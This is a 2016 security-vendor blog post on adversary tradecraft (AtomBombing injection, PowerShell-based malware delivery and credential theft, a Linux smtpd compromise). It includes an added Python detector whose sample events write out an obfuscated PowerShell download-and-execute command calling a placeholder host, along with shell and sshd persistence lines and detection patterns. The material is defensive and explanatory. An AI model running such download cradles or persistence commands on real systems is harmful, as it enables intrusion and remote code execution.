

Adversary Tricks and CrowdStrike Treats: 2016 Halloween and AtomBombing Edition


Yet another season for trick-or-treating is upon us, and just like I did last year, I wanted to share some of the new tricks we are seeing from targeted adversaries as observed by our Falcon ThreatGraph™, which collects threat data in real-time from our customer endpoint systems distributed in 176 countries.

But before I jump into the latest tradecraft we are observing in the wild, I would be remiss not to discuss the so-called AtomBombing code injection technique that was recently discussed by Tal Liberman as being capable of evading most legacy Anti-Virus products. Variants of this technique which use the NtQueueApcThread syscall to trigger code execution have actually been demonstrated before and used in a number of malware variants over the years. Wayne Low from F-Secure described a ransomware variant using just that type of technique (using Section objects instead of Atoms) in a 2012 Virus Bulletin article.

When the technique was first blogged about on Thursday, one of our engineers was curious to see how it would fare against the Indicator-of-Attack (IOA) based approach of Falcon Host, which doesn’t rely on advance knowledge of the vulnerability or exploit technique to detect a threat. Instead, it looks for the ultimate objective of the threat – in this case getting code execution, regardless of what the exact exploitation approach looks like. As predicted, Falcon Host had no trouble picking up an injection using this technique:


Falcon Host vs. AtomBombing (1:0)

Last year, I discussed the extensive use of ‘malware-free’ techniques by targeted adversaries for conducting intrusions into corporate networks. However, these techniques are not used exclusively for targeted intrusions. Increasingly, we are seeing mass-distributed malware threats, such as ransomware, leverage PowerShell for malicious activity. Here is an example of a process tree that Falcon Host picked up in the wild: JavaScript-initiated execution of PowerShell under the Chrome browser to download and execute malware:


Powershell-enabled malware distribution under Chrome

Note the mixed capitalization of letters in the command line used to launch PowerShell. No doubt the adversary is hoping to bypass legacy detection technologies that do direct content/signature matching.

Even when malware is used (often for persistence), PowerShell is frequently the method of choice for achieving specific objectives within the environment. Below is an example of an attempted breach we recently detected via multiple IOAs at a client. In this case, the persistent malware executes a command shell, which in turn runs a PowerShell command that proceeds to steal credentials from memory and perform reconnaissance.


Powershell-based reconnaissance and credential theft

Last but not least, so as not to leave out our *nix friends, I want to share with you a recent intrusion we picked up on a Linux host. An initial compromise of the smtpd mail daemon results in initial system reconnaissance through bash. The attacker performs a directory listing, checks logged-in users and collects group and user information. They then execute the ./a binary, a setuid executable designed to give them persistent root access, and ultimately start an sshd server on a POP3 port, to avoid suspicion, to give them persistent access into the environment.

Linux compromise via smtpd exploitation
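The three process trees above (browser spawning PowerShell with a mixed-case command line, persistent malware running a shell that runs PowerShell, and smtpd spawning bash and eventually sshd on a POP3 port) share a detection shape: an unexpected parent somewhere in the lineage, plus a child whose command line reveals the objective. The following is an added example, not CrowdStrike code or any Falcon Host rule, of how a defender can express such parent-child IOAs over process-creation telemetry. The event fields, rule format, process names and sample events are all constructed for this example.

```python
"""Illustrative parent-child IOA matcher over process-creation events.

Added example (not CrowdStrike's code).  Event field names, the rule
format and the sample telemetry below are assumptions of this example,
modelled on the process trees described in the post.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (field names are an assumption)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Rule:
    """`ancestors` may sit anywhere up the lineage (so an intermediate
    cmd.exe does not break the match); `child` is the process being
    evaluated; `cmdline` is a regex applied to the normalized command line."""
    name: str
    ancestors: Tuple[str, ...]
    child: Tuple[str, ...]
    cmdline: str = ".*"


BROWSERS = ("chrome.exe", "firefox.exe", "iexplore.exe")
SHELLS = ("bash", "sh", "dash")

RULES = [
    # Browser lineage -> PowerShell with download-and-execute indicators
    Rule("browser_spawns_powershell_download", BROWSERS, ("powershell.exe",),
         r"downloadstring|downloadfile|invoke-expression|\biex\b|-enc"),
    # Mail daemon lineage -> interactive shell (reconnaissance stage)
    Rule("mail_daemon_spawns_shell", ("smtpd",), SHELLS),
    # Mail daemon lineage -> sshd bound to the POP3 port (110)
    Rule("sshd_on_pop3_port", ("smtpd",), ("sshd",), r"-p\s*110\b"),
]


def normalize(cmdline: str) -> str:
    """Lower-case and collapse whitespace so mixed-case evasion
    (pOwErShElL) and padding do not defeat the pattern."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def lineage(by_pid: Dict[int, ProcEvent], pid: int) -> Iterator[str]:
    """Yield the image names of every ancestor of pid, nearest first."""
    seen = set()
    ev = by_pid.get(pid)
    while ev is not None and ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)
        ev = by_pid[ev.ppid]
        yield ev.image.lower()


def evaluate(events: List[ProcEvent], rules=RULES) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every event that satisfies a rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        image = ev.image.lower()
        ancestors = set(lineage(by_pid, ev.pid))
        for rule in rules:
            if image not in rule.child:
                continue
            if not ancestors.intersection(a.lower() for a in rule.ancestors):
                continue
            if re.search(rule.cmdline, normalize(ev.cmdline)):
                hits.append((rule.name, ev.pid))
    return hits


# Constructed sample telemetry, not real customer data.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "chrome.exe", "chrome.exe --type=renderer"),
    ProcEvent(101, 100, "powershell.exe",
              "pOwErShElL -nOp -w hIdDeN -c IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/x')"),
    ProcEvent(200, 1, "smtpd", "/usr/sbin/smtpd"),
    ProcEvent(201, 200, "bash", "/bin/bash -i"),
    ProcEvent(202, 201, "ls", "ls -la"),
    ProcEvent(203, 201, "w", "w"),
    ProcEvent(204, 201, "id", "id"),
    ProcEvent(205, 201, "a", "./a"),
    ProcEvent(206, 205, "sshd", "/usr/sbin/sshd -p 110"),
    # Benign: an administrator's scheduled script launched from the desktop shell
    ProcEvent(300, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(301, 300, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for name, pid in evaluate(SAMPLE_EVENTS):
        print(f"{name}: pid {pid}")
```

Because `lineage` walks the whole ancestry rather than only the direct parent, the second tree in the post (malware, then a command shell, then PowerShell) matches a rule keyed on the malware's image just as the browser tree does; and because matching happens on the normalized command line, the capitalization games in the Chrome example buy the adversary nothing. The benign explorer.exe-launched script produces no hit.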

Finally, this being a Halloween blog, I’d be remiss not to share our latest adversary desktop backgrounds for you to decorate your desktops with. And with us being only 8 days before U.S. election day, what better adversary to provide than FANCY BEAR, the Russian intelligence-affiliated actors who have become celebrities of sorts during this election campaign.



For more information on how IOAs work and how they contribute to the unique effectiveness of the Falcon Host platform, please download the white paper, “Indicators of Attack vs. Indicators of Compromise.”


Dmitri Alperovitch

Dmitri Alperovitch is a Co-founder of CrowdStrike who left the company in February 2020.

